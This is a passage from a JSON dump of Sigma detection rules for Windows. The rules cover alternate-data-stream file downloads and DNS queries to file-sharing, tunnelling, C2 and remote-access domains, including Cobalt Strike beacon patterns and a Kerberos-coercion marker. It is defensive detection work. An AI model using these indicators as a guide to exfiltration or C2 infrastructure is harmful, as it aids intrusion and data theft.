high\n"
  },
  {
    "path": "rules/windows/create_stream_hash/create_stream_hash_regedit_export_to_ads.yml",
    "content": "title: Exports Registry Key To an Alternate Data Stream\nid: 0d7a9363-af70-4e7b-a3b7-1a176b7fbe84\nstatus: test\ndescription: Exports the target Registry key and hides it in the specified alternate data stream.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Regedit/\n    - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f\nauthor: Oddvar Moe, Sander Wiebing, oscd.community\ndate: 2020-10-07\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1564.004\nlogsource:\n    product: windows\n    category: create_stream_hash\ndetection:\n    selection:\n        Image|endswith: '\\regedit.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml",
    "content": "title: Unusual File Download from Direct IP Address\nid: 025bd229-fd1f-4fdb-97ab-20006e1a5368\nstatus: test\ndescription: Detects the download of suspicious file type from URLs with IP\nreferences:\n    - https://github.com/trustedsec/SysmonCommunityGuide/blob/adcdfee20999f422b974c8d4149bf4c361237db7/chapters/file-stream-creation-hash.md\n    - https://labs.withsecure.com/publications/detecting-onenote-abuse\nauthor: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)\ndate: 2022-09-07\nmodified: 2023-02-10\ntags:\n    - attack.defense-evasion\n    - attack.t1564.004\nlogsource:\n    product: windows\n    category: create_stream_hash\ndetection:\n    selection:\n        Contents|re: 'http[s]?://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}'\n        TargetFilename|contains:\n            - '.ps1:Zone'\n            - '.bat:Zone'\n            - '.exe:Zone'\n            - '.vbe:Zone'\n            - '.vbs:Zone'\n            - '.dll:Zone'\n            - '.one:Zone'\n            - '.cmd:Zone'\n            - '.hta:Zone'\n            - '.xll:Zone'\n            - '.lnk:Zone'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/create_stream_hash/create_stream_hash_winget_susp_package_source.yml",
    "content": "title: Potential Suspicious Winget Package Installation\nid: a3f5c081-e75b-43a0-9f5b-51f26fe5dba2\nstatus: test\ndescription: Detects potential suspicious winget package installation from a suspicious source.\nreferences:\n    - https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-18\ntags:\n    - attack.defense-evasion\n    - attack.persistence\nlogsource:\n    product: windows\n    category: create_stream_hash\ndetection:\n    selection:\n        Contents|startswith: '[ZoneTransfer]  ZoneId=3'\n        Contents|contains:\n            # Note: Add any untrusted sources that are custom to your env\n            - '://1'\n            - '://2'\n            - '://3'\n            - '://4'\n            - '://5'\n            - '://6'\n            - '://7'\n            - '://8'\n            - '://9'\n        TargetFilename|endswith: ':Zone.Identifier'\n        TargetFilename|contains: '\\AppData\\Local\\Temp\\WinGet\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/create_stream_hash/create_stream_hash_zip_tld_download.yml",
    "content": "title: Potentially Suspicious File Download From ZIP TLD\nid: 0bb4bbeb-fe52-4044-b40c-430a04577ebe\nstatus: test\ndescription: Detects the download of a file with a potentially suspicious extension from a .zip top level domain.\nreferences:\n    - https://twitter.com/cyb3rops/status/1659175181695287297\n    - https://fabian-voith.de/2020/06/25/sysmon-v11-1-reads-alternate-data-streams/\nauthor: Florian Roth (Nextron Systems)\ndate: 2023-05-18\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    category: create_stream_hash\ndetection:\n    selection:\n        Contents|contains: '.zip/'\n        TargetFilename|contains:\n            - '.bat:Zone'\n            - '.dat:Zone'\n            - '.dll:Zone'\n            - '.doc:Zone'\n            - '.docm:Zone'\n            - '.exe:Zone'\n            - '.hta:Zone'\n            - '.pptm:Zone'\n            - '.ps1:Zone'\n            - '.rar:Zone'\n            - '.rtf:Zone'\n            - '.sct:Zone'\n            - '.vbe:Zone'\n            - '.vbs:Zone'\n            - '.ws:Zone'\n            - '.wsf:Zone'\n            - '.xll:Zone'\n            - '.xls:Zone'\n            - '.xlsm:Zone'\n            - '.zip:Zone'\n    condition: selection\nfalsepositives:\n    - Legitimate file downloads from a websites and web services that uses the \".zip\" top level domain.\nlevel: high\n"
  },
  {
    "path": "rules/windows/dns_query/dns_query_win_anonymfiles_com.yml",
    "content": "title: DNS Query for Anonfiles.com Domain - Sysmon\nid: 065cceea-77ec-4030-9052-fc0affea7110\nrelated:\n    - id: 29f171d7-aa47-42c7-9c7b-3c87938164d9\n      type: similar\nstatus: test\ndescription: Detects DNS queries for \"anonfiles.com\", which is an anonymous file upload platform often used for malicious purposes\nreferences:\n    - https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte\nauthor: pH-T (Nextron Systems)\ndate: 2022-07-15\nmodified: 2023-01-16\ntags:\n    - attack.exfiltration\n    - attack.t1567.002\nlogsource:\n    product: windows\n    category: dns_query\ndetection:\n    selection:\n        QueryName|contains: '.anonfiles.com'\n    condition: selection\nfalsepositives:\n    - Rare legitimate access to anonfiles.com\nlevel: high\n"
  },
  {
    "path": "rules/windows/dns_query/dns_query_win_appinstaller.yml",
    "content": "title: AppX Package Installation Attempts Via AppInstaller.EXE\nid: 7cff77e1-9663-46a3-8260-17f2e1aa9d0a\nrelated:\n    - id: 180c7c5c-d64b-4a63-86e9-68910451bc8b\n      type: derived\nstatus: test\ndescription: |\n    Detects DNS queries made by \"AppInstaller.EXE\". The AppInstaller is the default handler for the \"ms-appinstaller\" URI. It attempts to load/install a package from the referenced URL\nreferences:\n    - https://twitter.com/notwhickey/status/1333900137232523264\n    - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/\nauthor: frack113\ndate: 2021-11-24\nmodified: 2023-11-09\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    product: windows\n    category: dns_query\ndetection:\n    selection:\n        Image|startswith: 'C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_'\n        Image|endswith: '\\AppInstaller.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/dns_query/dns_query_win_cloudflared_communication.yml",
    "content": "title: Cloudflared Tunnels Related DNS Requests\nid: a1d9eec5-33b2-4177-8d24-27fe754d0812\nrelated:\n    - id: 7cd1dcdc-6edf-4896-86dc-d1f19ad64903\n      type: similar\nstatus: test\ndescription: |\n    Detects DNS requests to Cloudflared tunnels domains.\n    Attackers can abuse that feature to establish a reverse shell or persistence on a machine.\nreferences:\n    - https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-12-20\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\n    - attack.t1572\nlogsource:\n    category: dns_query\n    product: windows\ndetection:\n    selection:\n        QueryName|endswith:\n            - '.v2.argotunnel.com'\n            - 'protocol-v2.argotunnel.com'\n            - 'trycloudflare.com'\n            - 'update.argotunnel.com'\n    condition: selection\nfalsepositives:\n    - Legitimate use of cloudflare tunnels will also trigger this.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/dns_query/dns_query_win_common_malware_hosting_services.yml",
    "content": "title: DNS Query To Common Malware Hosting and Shortener Services\nid: f8c1e80b-c73a-476a-ae24-6c72528b1521\nstatus: experimental\ndescription: |\n    Detects DNS queries to domains commonly used by threat actors to host malware payloads or redirect through URL shorteners.\n    These include platforms like Cloudflare Workers, TryCloudflare, InfinityFree, and URL shorteners such as tinyurl and lihi.cc.\n    Such DNS activity can indicate potential delivery or command-and-control communication attempts.\nreferences:\n    - https://cloud.google.com/blog/topics/threat-intelligence/apt41-innovative-tactics\nauthor: Ahmed Nosir (@egycondor)\ndate: 2025-06-02\ntags:\n    - attack.command-and-control\n    - attack.t1071.004\nlogsource:\n    product: windows\n    category: dns_query\ndetection:\n    selection:\n        QueryName|contains:\n            - 'msapp.workers.dev'\n            - 'trycloudflare.com'\n            - 'infinityfreeapp.com'\n            - 'my5353.com'\n            - 'reurl.cc'\n            - 'lihi.cc'\n            - 'tinyurl.com'\n    condition: selection\nfalsepositives:\n    - Legitimate use of these services is possible but rare in enterprise environments\nlevel: medium\n"
  },
  {
    "path": "rules/windows/dns_query/dns_query_win_devtunnels_communication.yml",
    "content": "title: DNS Query To Devtunnels Domain\nid: 1cb0c6ce-3d00-44fc-ab9c-6d6d577bf20b\nrelated:\n    - id: 9501f8e6-8e3d-48fc-a8a6-1089dd5d7ef4 # Net Connection DevTunnels\n      type: similar\n    - id: 4b657234-038e-4ad5-997c-4be42340bce4 # Net Connection VsCode\n      type: similar\n    - id: b3e6418f-7c7a-4fad-993a-93b65027a9f1 # DNS VsCode\n      type: similar\nstatus: test\ndescription: |\n    Detects DNS query requests to Devtunnels domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.\nreferences:\n    - https://blueteamops.medium.com/detecting-dev-tunnels-16f0994dc3e2\n    - https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/security\n    - https://cydefops.com/devtunnels-unleashed\nauthor: citron_ninja\ndate: 2023-10-25\nmodified: 2023-11-20\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\n    - attack.t1572\nlogsource:\n    category: dns_query\n    product: windows\ndetection:\n    selection:\n        QueryName|endswith: '.devtunnels.ms'\n    condition: selection\nfalsepositives:\n    - Legitimate use of Devtunnels will also trigger this.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/dns_query/dns_query_win_dns_server_discovery_via_ldap_query.yml",
    "content": "title: DNS Server Discovery Via LDAP Query\nid: a21bcd7e-38ec-49ad-b69a-9ea17e69509e\nstatus: test\ndescription: Detects DNS server discovery via LDAP query requests from uncommon applications\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/980f3f83fd81f37c1ca9c02dccfd1c3d9f9d0841/atomics/T1016/T1016.md#atomic-test-9---dns-server-discovery-using-nslookup\n    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/7fcdce70-5205-44d6-9c3a-260e616a2f04\nauthor: frack113\ndate: 2022-08-20\nmodified: 2023-09-18\ntags:\n    - attack.discovery\n    - attack.t1482\nlogsource:\n    product: windows\n    category: dns_query\ndetection:\n    selection:\n        QueryName|startswith: '_ldap.'\n    filter_main_generic:\n        Image|contains:\n            - ':\\Program Files\\'\n            - ':\\Program Files (x86)\\'\n            - ':\\Windows\\'\n    filter_main_defender:\n        Image|contains: ':\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n        Image|endswith: '\\MsMpEng.exe'\n    filter_main_unknown:\n        Image: '<unknown process>'\n    filter_optional_azure:\n        Image|startswith: 'C:\\WindowsAzure\\GuestAgent'\n    filter_main_null:\n        Image: null\n    filter_optional_browsers:\n        # Note: This list is for browsers installed in the user context. To avoid basic evasions based on image name. Best to baseline this list with the browsers you use internally and add their full paths.\n        Image|endswith:\n            - '\\chrome.exe'\n            - '\\firefox.exe'\n            - '\\opera.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Likely\n# Note: Incrase the level once a baseline is established\nlevel: low\n"
  },
  {
    "path": "rules/windows/dns_query/dns_query_win_domain_azurewebsites.yml",
    "content": "title: DNS Query To AzureWebsites.NET By Non-Browser Process\nid: e043f529-8514-4205-8ab0-7f7d2927b400\nrelated:\n    - id: 5c80b618-0dbb-46e6-acbb-03d90bcb6d83\n      type: derived\nstatus: test\ndescription: |\n    Detects a DNS query by a non browser process on the system to \"azurewebsites.net\". The latter was often used by threat actors as a malware hosting and exfiltration site.\nreferences:\n    - https://www.sentinelone.com/labs/wip26-espionage-threat-actors-abuse-cloud-infrastructure-in-targeted-telco-attacks/\n    - https://symantec-enterprise-blogs.security.com/threat-intelligence/harvester-new-apt-attacks-asia\n    - https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/\n    - https://intezer.com/blog/research/how-we-escaped-docker-in-azure-functions/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-06-24\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    product: windows\n    category: dns_query\ndetection:\n    selection:\n        QueryName|endswith: 'azurewebsites.net'\n    filter_optional_chrome:\n        Image:\n            - 'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe'\n            - 'C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe'\n    filter_optional_firefox:\n        Image:\n            - 'C:\\Program Files\\Mozilla Firefox\\firefox.exe'\n            - 'C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe'\n    filter_optional_ie:\n        Image:\n            - 'C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe'\n            - 'C:\\Program Files\\Internet Explorer\\iexplore.exe'\n    filter_optional_edge_1:\n        - Image|startswith: 'C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\'\n        - Image|endswith: '\\WindowsApps\\MicrosoftEdge.exe'\n        - Image:\n              - 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe'\n              - 'C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe'\n    filter_optional_edge_2:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Microsoft\\EdgeCore\\'\n            - 'C:\\Program Files\\Microsoft\\EdgeCore\\'\n        Image|endswith:\n            - '\\msedge.exe'\n            - '\\msedgewebview2.exe'\n    filter_optional_safari:\n        Image|endswith: '\\safari.exe'\n    filter_optional_defender:\n        Image|endswith:\n            - '\\MsMpEng.exe' # Microsoft Defender executable\n            - '\\MsSense.exe' # Windows Defender Advanced Threat Protection Service Executable\n    filter_optional_brave:\n        Image|endswith: '\\brave.exe'\n        Image|startswith: 'C:\\Program Files\\BraveSoftware\\'\n    filter_optional_maxthon:\n        Image|contains: '\\AppData\\Local\\Maxthon\\'\n        Image|endswith: '\\maxthon.exe'\n    filter_optional_opera:\n        Image|contains: '\\AppData\\Local\\Programs\\Opera\\'\n        Image|endswith: '\\opera.exe'\n    filter_optional_seamonkey:\n        Image|startswith:\n            - 'C:\\Program Files\\SeaMonkey\\'\n            - 'C:\\Program Files (x86)\\SeaMonkey\\'\n        Image|endswith: '\\seamonkey.exe'\n    filter_optional_vivaldi:\n        Image|contains: '\\AppData\\Local\\Vivaldi\\'\n        Image|endswith: '\\vivaldi.exe'\n    filter_optional_whale:\n        Image|startswith:\n            - 'C:\\Program Files\\Naver\\Naver Whale\\'\n            - 'C:\\Program Files (x86)\\Naver\\Naver Whale\\'\n        Image|endswith: '\\whale.exe'\n    filter_optional_tor:\n        Image|contains: '\\Tor Browser\\'\n    filter_optional_whaterfox:\n        Image|startswith:\n            - 'C:\\Program Files\\Waterfox\\'\n            - 'C:\\Program Files (x86)\\Waterfox\\'\n        Image|endswith: '\\Waterfox.exe'\n    filter_optional_midori:\n        Image|contains: '\\AppData\\Local\\Programs\\midori-ng\\'\n        Image|endswith: '\\Midori Next Generation.exe'\n    filter_optional_slimbrowser:\n        Image|startswith:\n            - 'C:\\Program Files\\SlimBrowser\\'\n            - 'C:\\Program Files (x86)\\SlimBrowser\\'\n        Image|endswith: '\\slimbrowser.exe'\n    filter_optional_flock:\n        Image|contains: '\\AppData\\Local\\Flock\\'\n        Image|endswith: '\\Flock.exe'\n    filter_optional_phoebe:\n        Image|contains: '\\AppData\\Local\\Phoebe\\'\n        Image|endswith: '\\Phoebe.exe'\n    filter_optional_falkon:\n        Image|startswith:\n            - 'C:\\Program Files\\Falkon\\'\n            - 'C:\\Program Files (x86)\\Falkon\\'\n        Image|endswith: '\\falkon.exe'\n    filter_optional_avant:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Avant Browser\\'\n            - 'C:\\Program Files\\Avant Browser\\'\n        Image|endswith: '\\avant.exe'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Likely with other browser software. Apply additional filters for any other browsers you might use.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/dns_query/dns_query_win_finger.yml",
    "content": "title: DNS Query by Finger Utility\nid: c082c2b0-525b-4dbc-9a26-a57dc4692074\nrelated:\n    - id: 2fdaf50b-9fd5-449f-ba69-f17248119af6\n      type: similar\n    - id: af491bca-e752-4b44-9c86-df5680533dbc\n      type: similar\nstatus: experimental\ndescription: |\n    Detects DNS queries made by the finger utility, which can be abused by threat actors to retrieve remote commands for execution on Windows devices.\n    In one ClickFix malware campaign, adversaries leveraged the finger protocol to fetch commands from a remote server.\n    Since the finger utility is not commonly used in modern Windows environments, its presence already raises suspicion.\n    Investigating such DNS queries can also help identify potential malicious infrastructure used by threat actors for command and control (C2) communication.\nreferences:\n    - https://www.bleepingcomputer.com/news/security/decades-old-finger-protocol-abused-in-clickfix-malware-attacks/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-11-19\ntags:\n    - attack.command-and-control\n    - attack.t1071.004\n    - attack.execution\n    - attack.t1059.003\nlogsource:\n    product: windows\n    category: dns_query\ndetection:\n    selection:\n        Image|endswith: '\\finger.exe'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/dns_query/dns_query_win_gup_query_to_uncommon_domains.yml",
    "content": "title: Notepad++ Updater DNS Query to Uncommon Domains\nid: 2074e137-1b73-4e2d-88ba-5a3407dbdce0\nstatus: experimental\ndescription: |\n    Detects when the Notepad++ updater (gup.exe) makes DNS queries to domains that are not part of the known legitimate update infrastructure.\n    This could indicate potential exploitation of the updater mechanism or suspicious network activity that warrants further investigation.\nreferences:\n    - https://notepad-plus-plus.org/news/v889-released/\n    - https://www.heise.de/en/news/Notepad-updater-installed-malware-11109726.html\n    - https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/\n    - https://www.validin.com/blog/exploring_notepad_plus_plus_network_indicators/\n    - https://securelist.com/notepad-supply-chain-attack/118708/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2026-02-02\ntags:\n    - attack.collection\n    - attack.credential-access\n    - attack.t1195.002\n    - attack.initial-access\n    - attack.t1557\nlogsource:\n    category: dns_query\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\gup.exe'\n    filter_main_notepad_legit_domain:\n        QueryName: 'notepad-plus-plus.org'\n    filter_optional_sourceforge_legit_domain:\n        QueryName|endswith: '.sourceforge.net'\n    filter_optional_github_legit_domain:\n        - QueryName|endswith: '.githubusercontent.com'\n        - QueryName: 'github.com'\n    filter_optional_google_storage_legit_domain:\n        QueryName|endswith: '.googleapis.com'\n    # Add other known legitimate domains if any\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Some legitimate network misconfigurations or proxy issues causing unexpected DNS queries.\n    - Other legitimate query to official domains not listed in the filter, needing tuning.\nlevel: medium # can be upgraded to high after tuning with known legitimate DNS queries\n"
  },
  {
    "path": "rules/windows/dns_query/dns_query_win_hybridconnectionmgr_servicebus.yml",
    "content": "title: DNS HybridConnectionManager Service Bus\nid: 7bd3902d-8b8b-4dd4-838a-c6862d40150d\nstatus: test\ndescription: Detects Azure Hybrid Connection Manager services querying the Azure service bus service\nreferences:\n    - https://twitter.com/Cyb3rWard0g/status/1381642789369286662\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2021-04-12\nmodified: 2023-01-16\ntags:\n    - attack.persistence\n    - attack.t1554\nlogsource:\n    product: windows\n    category: dns_query\ndetection:\n    selection:\n        QueryName|contains: 'servicebus.windows.net'\n        Image|contains: 'HybridConnectionManager'\n    condition: selection\nfalsepositives:\n    - Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service\nlevel: high\n"
  },
  {
    "path": "rules/windows/dns_query/dns_query_win_kerberos_coercion_via_dns_object_spoofing.yml",
    "content": "title: Suspicious DNS Query Indicating Kerberos Coercion via DNS Object SPN Spoofing\nid: e7a21b5f-d8c4-4ae5-b8d9-93c5d3f28e1c\nrelated:\n    - id: b07e58cf-cacc-4135-8473-ccb2eba63dd2 # Potential Kerberos Coercion via DNS Object Spoofing\n      type: similar\n    - id: 5588576c-5898-4fac-bcdd-7475a60e8f43 # Suspicious DNS Query Indicating Kerberos Coercion via DNS Object Spoofing - Network\n      type: similar\nstatus: experimental\ndescription: |\n    Detects DNS queries containing patterns associated with Kerberos coercion attacks via DNS object spoofing.\n    The pattern \"1UWhRCAAAAA..BAAAA\" is a base64-encoded signature that corresponds to a marshaled CREDENTIAL_TARGET_INFORMATION structure.\n    Attackers can use this technique to coerce authentication from victim systems to attacker-controlled hosts.\n    It is one of the strong indicators of a Kerberos coercion attack, where adversaries manipulate DNS records\n    to spoof Service Principal Names (SPNs) and redirect authentication requests like CVE-2025-33073.\nreferences:\n    - https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025\n    - https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-06-20\ntags:\n    - attack.collection\n    - attack.credential-access\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1557.001\n    - attack.t1187\nlogsource:\n    product: windows\n    category: dns_query\ndetection:\n    selection:\n        QueryName|contains|all:\n            - 'UWhRCA'\n            - 'BAAAA'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/dns_query/dns_query_win_mal_cobaltstrike.yml",
    "content": "title: Suspicious Cobalt Strike DNS Beaconing - Sysmon\nid: f356a9c4-effd-4608-bbf8-408afd5cd006\nrelated:\n    - id: 0d18728b-f5bf-4381-9dcf-915539fff6c2\n      type: similar\nstatus: test\ndescription: Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons\nreferences:\n    - https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns\n    - https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-11-09\nmodified: 2023-01-16\ntags:\n    - attack.command-and-control\n    - attack.t1071.004\nlogsource:\n    product: windows\n    category: dns_query\ndetection:\n    selection1:\n        QueryName|startswith:\n            - 'aaa.stage.'\n            - 'post.1'\n    selection2:\n        QueryName|contains: '.stage.123456.'\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/dns_query/dns_query_win_mega_nz.yml",
    "content": "title: DNS Query To MEGA Hosting Website\nid: 613c03ba-0779-4a53-8a1f-47f914a4ded3\nrelated:\n    - id: 66474410-b883-415f-9f8d-75345a0a66a6\n      type: similar\nstatus: test\ndescription: Detects DNS queries for subdomains related to MEGA sharing website\nreferences:\n    - https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/\nauthor: Aaron Greetham (@beardofbinary) - NCC Group\ndate: 2021-05-26\nmodified: 2023-09-18\ntags:\n    - attack.exfiltration\n    - attack.t1567.002\nlogsource:\n    product: windows\n    category: dns_query\ndetection:\n    selection:\n        QueryName|contains: 'userstorage.mega.co.nz'\n    condition: selection\nfalsepositives:\n    - Legitimate DNS queries and usage of Mega\nlevel: medium\n"
  },
  {
    "path": "rules/windows/dns_query/dns_query_win_onelaunch_update_service.yml",
    "content": "title: DNS Query Request To OneLaunch Update Service\nid: df68f791-ad95-447f-a271-640a0dab9cf8\nstatus: test\ndescription: |\n    Detects DNS query requests to \"update.onelaunch.com\". This domain is associated with the OneLaunch adware application.\n    When the OneLaunch application is installed it will attempt to get updates from this domain.\nreferences:\n    - https://www.malwarebytes.com/blog/detections/pup-optional-onelaunch-silentcf\n    - https://www.myantispyware.com/2020/12/14/how-to-uninstall-onelaunch-browser-removal-guide/\n    - https://malware.guide/browser-hijacker/remove-onelaunch-virus/\nauthor: Josh Nickels\ndate: 2024-02-26\ntags:\n    - attack.credential-access\n    - attack.collection\n    - attack.t1056\nlogsource:\n    category: dns_query\n    product: windows\ndetection:\n    selection:\n        QueryName: 'update.onelaunch.com'\n        Image|endswith: '\\OneLaunch.exe'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: low\n"
  },
  {
    "path": "rules/windows/dns_query/dns_query_win_quickassist.yml",
    "content": "title: DNS Query Request By QuickAssist.EXE\nid: 882e858a-3233-4ba8-855e-2f3d3575803d\nstatus: experimental\ndescription: |\n    Detects DNS queries initiated by \"QuickAssist.exe\" to Microsoft Quick Assist primary endpoint that is used to establish a session.\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2024/05/15/threat-actors-misusing-quick-assist-in-social-engineering-attacks-leading-to-ransomware/\n    - https://www.linkedin.com/posts/kevin-beaumont-security_ive-been-assisting-a-few-orgs-hit-with-successful-activity-7268055739116445701-xxjZ/\n    - https://x.com/cyb3rops/status/1862406110365245506\n    - https://learn.microsoft.com/en-us/windows/client-management/client-tools/quick-assist\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2024-12-19\ntags:\n    - attack.command-and-control\n    - attack.initial-access\n    - attack.lateral-movement\n    - attack.t1071.001\n    - attack.t1210\nlogsource:\n    category: dns_query\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\QuickAssist.exe'\n        QueryName|endswith: 'remoteassistance.support.services.microsoft.com'\n    condition: selection\nfalsepositives:\n    - Legitimate use of Quick Assist in the environment.\nlevel: low\n"
  },
  {
    "path": "rules/windows/dns_query/dns_query_win_regsvr32_dns_query.yml",
    "content": "title: DNS Query Request By Regsvr32.EXE\nid: 36e037c4-c228-4866-b6a3-48eb292b9955\nrelated:\n    - id: c7e91a02-d771-4a6d-a700-42587e0b1095\n      type: derived\nstatus: test\ndescription: Detects DNS queries initiated by \"Regsvr32.exe\"\nreferences:\n    - https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/\n    - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/\nauthor: Dmitriy Lifanov, oscd.community\ndate: 2019-10-25\nmodified: 2023-09-18\ntags:\n    - attack.execution\n    - attack.t1559.001\n    - attack.defense-evasion\n    - attack.t1218.010\nlogsource:\n    category: dns_query\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\regsvr32.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/dns_query/dns_query_win_remote_access_software_domains_non_browsers.yml",
    "content": "title: DNS Query To Remote Access Software Domain From Non-Browser App\nid: 4d07b1f4-cb00-4470-b9f8-b0191d48ff52\nrelated:\n    - id: 71ba22cb-8a01-42e2-a6dd-5bf9b547498f\n      type: obsolete\n    - id: 7c4cf8e0-1362-48b2-a512-b606d2065d7d\n      type: obsolete\n    - id: ed785237-70fa-46f3-83b6-d264d1dc6eb4\n      type: obsolete\nstatus: test\ndescription: |\n    An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\n    These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\n    Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-6---ammyy-admin-software-execution\n    - https://redcanary.com/blog/misbehaving-rats/\n    - https://techcommunity.microsoft.com/t5/microsoft-sentinel-blog/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\n    - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-320a\n    - https://blog.sekoia.io/scattered-spider-laying-new-eggs/\n    - https://learn.microsoft.com/en-us/windows/client-management/client-tools/quick-assist#disable-quick-assist-within-your-organization\nauthor: frack113, Connor Martin\ndate: 2022-07-11\nmodified: 2024-12-17\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    product: windows\n    category: dns_query\ndetection:\n    selection_generic:\n        QueryName|endswith:\n            - 'agent.jumpcloud.com'\n            - 'agentreporting.atera.com'\n            - 'ammyy.com'\n            - 'api.parsec.app'\n            - 'api.playanext.com'\n            - 'api.splashtop.com'\n            - 'app.atera.com'\n            - 'assist.zoho.com'\n            - 'authentication.logmeininc.com'\n            - 'beyondtrustcloud.com'\n            - 'cdn.kaseya.net'\n            - 'client.teamviewer.com'\n            - 'comserver.corporate.beanywhere.com'\n            - 'control.connectwise.com'\n            - 'downloads.zohocdn.com'\n            - 'dwservice.net'\n            - 'express.gotoassist.com'\n            - 'getgo.com'\n            - 'getscreen.me'  # https://x.com/malmoeb/status/1868757130624614860?s=12&t=C0_T_re0wRP_NfKa27Xw9w\n            - 'integratedchat.teamviewer.com'\n            - 'join.zoho.com'\n            - 'kickstart.jumpcloud.com'\n            - 'license.bomgar.com'\n            - 'logmein-gateway.com'\n            - 'logmein.com'\n            - 'logmeincdn.http.internapcdn.net'\n            - 'n-able.com'\n            - 'net.anydesk.com'\n            - 